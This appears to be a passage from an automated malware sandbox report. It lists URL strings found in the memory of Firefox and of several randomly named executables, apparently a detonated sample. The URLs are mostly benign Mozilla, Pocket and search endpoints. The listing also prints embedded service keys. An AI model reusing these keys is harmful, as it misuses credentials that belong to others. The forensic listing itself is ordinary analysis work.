Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureWebExtensionUncheckedLastErr
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureElementReleaseCaptureWarning
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 0000001A.00000002.3266603908.0000019E4C266000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#EncryptionPreventDefaultFromP
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: firefox.exe, 0000001A.00000002.3266603908.0000019E4C266000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: 7451ae0b11.exe, 0000000B.00000003.2960373733.0000000004BCB000.00000004.00001000.00020000.00000000.sdmp, 7451ae0b11.exe, 0000000B.00000002.3001129617.000000000016C000.00000040.00000001.01000000.0000000E.sdmp, num.exe, 00000025.00000000.3281198847.0000000000C1C000.00000008.00000001.01000000.0000001A.sdmp String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 0000001A.00000002.3257880743.0000019E4BF80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3095374123.0000019E4B76D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3086228555.0000019E4B852000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3084909437.0000019E4B600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3085359079.0000019E4B80F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000003.2174370045.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896261286.0000000005958000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896136861.000000000596F000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051709799.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3056682924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051343446.000000000601D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2174370045.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896261286.0000000005958000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896136861.000000000596F000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051709799.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3056682924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051343446.000000000601D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2174370045.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896261286.0000000005958000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896136861.000000000596F000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051709799.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3056682924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051343446.000000000601D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://ebay.com
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://fb.me/react-polyfillsO
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://fb.me/react-polyfillsP
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://fb.me/react-polyfillsPO
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3165170400.0000019E4E0ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/74f06853-c80d-4afc-9b2
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/browser/components/newtab/content-src/asrouter/docs/debuggin
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001A.00000002.3273080593.0000019E4C950000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3257880743.0000019E4BF80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsm
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsmoz-e
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsmr
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/nimbus-desktop-experiments
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordsi
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1i
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1i#
Source: firefox.exe, 0000001A.00000002.3234086295.0000019E48C4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3224109770.0000019E3B86B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3165170400.0000019E4E0ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3276626657.0000019E4CD8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3276626657.0000019E4CD8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://getpocket.com/
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://getpocket.com/a4
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://getpocket.com/collections
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://getpocket.com/explore/
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3276626657.0000019E4CD8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://getpocket.com/read/$
Source: firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3276626657.0000019E4CD8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001A.00000002.3236996781.0000019E48E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 0000001A.00000003.3135984680.0000019E53E83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3200289786.0000019E53E84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3142796839.0000019E53E85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 0000001A.00000003.3135984680.0000019E53E83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3200289786.0000019E53E84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3142796839.0000019E53E85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 0000001A.00000003.3084909437.0000019E4B600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3085359079.0000019E4B80F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://github.com/projectfluent/fluent.js/wiki/React-Overlays.
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://help.getpocket.com/article/1142-firefox-new-tab-recommendations-faq
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001A.00000002.3224109770.0000019E3B811000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881a
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/7
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 0000001A.00000002.3276626657.0000019E4CD52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 0000001A.00000002.3269450087.0000019E4C376000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 0000001A.00000002.3266603908.0000019E4C2CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001A.00000002.3266603908.0000019E4C2CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3247453530.0000019E4B540000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 0000001A.00000002.3236996781.0000019E48E21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest5
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestError
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
